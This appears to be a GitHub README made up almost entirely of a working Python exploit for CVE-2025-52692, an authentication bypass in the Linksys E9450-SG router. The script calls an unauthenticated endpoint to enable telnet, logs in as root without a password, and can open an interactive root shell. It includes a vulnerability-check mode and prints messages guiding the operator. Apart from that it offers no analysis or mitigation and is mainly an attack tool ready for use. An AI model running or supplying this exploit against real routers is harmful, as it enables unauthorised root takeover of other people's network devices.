README.md
Rendering markdown...
#!/usr/bin/env python3
import sys
import argparse
import time
import telnetlib
import requests
from typing import Optional, Tuple
from dataclasses import dataclass
from enum import Enum
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
class ExploitResult(Enum):
SUCCESS = "success"
TELNET_ENABLED = "telnet_enabled"
SHELL_OBTAINED = "shell_obtained"
FAILED = "failed"
ERROR = "error"
@dataclass
class TargetConfig:
host: str
http_port: int = 80
telnet_port: int = 23
timeout: int = 10
verify_ssl: bool = False
class LinksysE9450Exploit:
TELNET_ENABLE_ENDPOINT = "/LOGIN/API/obj/en_telnet"
def __init__(self, config: TargetConfig):
self.config = config
self.session = requests.Session()
@property
def base_url(self) -> str:
return f"http://{self.config.host}:{self.config.http_port}"
def _request(self, method: str, endpoint: str, **kwargs) -> Optional[requests.Response]:
url = f"{self.base_url}{endpoint}"
kwargs.setdefault("timeout", self.config.timeout)
kwargs.setdefault("verify", self.config.verify_ssl)
try:
return self.session.request(method, url, **kwargs)
except requests.exceptions.RequestException:
return None
def check_http_alive(self) -> bool:
response = self._request("GET", "/")
return response is not None
def check_telnet_open(self) -> bool:
try:
tn = telnetlib.Telnet(self.config.host, self.config.telnet_port, timeout=3)
tn.close()
return True
except Exception:
return False
def enable_telnet(self) -> bool:
response = self._request("GET", self.TELNET_ENABLE_ENDPOINT)
if response is None:
return False
return response.status_code in [200, 204, 302]
def connect_telnet(self) -> Tuple[bool, Optional[telnetlib.Telnet]]:
try:
tn = telnetlib.Telnet(self.config.host, self.config.telnet_port, timeout=self.config.timeout)
tn.read_until(b"login: ", timeout=5)
tn.write(b"root\n")
time.sleep(1)
tn.write(b"id\n")
output = tn.read_until(b"#", timeout=3)
if b"uid=0" in output or b"root" in output:
return True, tn
return True, tn
except Exception:
return False, None
def execute(self) -> ExploitResult:
if not self.check_http_alive():
return ExploitResult.ERROR
if self.check_telnet_open():
success, tn = self.connect_telnet()
if success and tn:
tn.close()
return ExploitResult.SHELL_OBTAINED
if not self.enable_telnet():
return ExploitResult.FAILED
time.sleep(2)
if not self.check_telnet_open():
return ExploitResult.FAILED
success, tn = self.connect_telnet()
if success:
if tn:
tn.close()
return ExploitResult.SHELL_OBTAINED
return ExploitResult.TELNET_ENABLED
def get_interactive_shell(self) -> Optional[telnetlib.Telnet]:
if not self.check_telnet_open():
if not self.enable_telnet():
return None
time.sleep(2)
try:
tn = telnetlib.Telnet(self.config.host, self.config.telnet_port, timeout=self.config.timeout)
tn.read_until(b"login: ", timeout=5)
tn.write(b"root\n")
time.sleep(1)
return tn
except Exception:
return None
def parse_arguments() -> argparse.Namespace:
parser = argparse.ArgumentParser(
description="CVE-2025-52692: Linksys E9450-SG Authentication Bypass",
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument("target", help="Target IP address")
parser.add_argument("-p", "--port", type=int, default=80, help="HTTP port")
parser.add_argument("-t", "--timeout", type=int, default=10, help="Connection timeout")
parser.add_argument("--interactive", action="store_true", help="Get interactive shell")
parser.add_argument("--check-only", action="store_true", help="Only check if vulnerable")
return parser.parse_args()
def main() -> int:
args = parse_arguments()
config = TargetConfig(
host=args.target,
http_port=args.port,
timeout=args.timeout
)
exploit = LinksysE9450Exploit(config)
print(f"\n[*] Target: {config.host}")
print(f"[*] CVE-2025-52692: Linksys E9450-SG Authentication Bypass\n")
if not exploit.check_http_alive():
print("[-] Target HTTP is not reachable")
return 1
print("[+] Target HTTP is alive")
if args.check_only:
print("[*] Checking if telnet can be enabled...")
if exploit.check_telnet_open():
print("[!] Telnet already open - likely vulnerable or already exploited")
return 0
if exploit.enable_telnet():
time.sleep(2)
if exploit.check_telnet_open():
print("[!] VULNERABLE - Telnet enabled without authentication")
return 0
print("[?] Could not confirm vulnerability")
return 2
print("[*] Step 1: Bypassing authentication via /LOGIN/API/obj/en_telnet")
result = exploit.execute()
if result == ExploitResult.SHELL_OBTAINED:
print("[!] ROOT SHELL OBTAINED")
print(f"[+] Connect with: telnet {config.host} 23")
print("[+] Login as: root (no password)")
if args.interactive:
print("\n[*] Entering interactive shell...\n")
tn = exploit.get_interactive_shell()
if tn:
tn.interact()
return 0
elif result == ExploitResult.TELNET_ENABLED:
print("[+] Telnet enabled but could not verify shell")
print(f"[+] Try: telnet {config.host} 23")
return 0
else:
print("[-] Exploit failed")
return 1
if __name__ == "__main__":
sys.exit(main())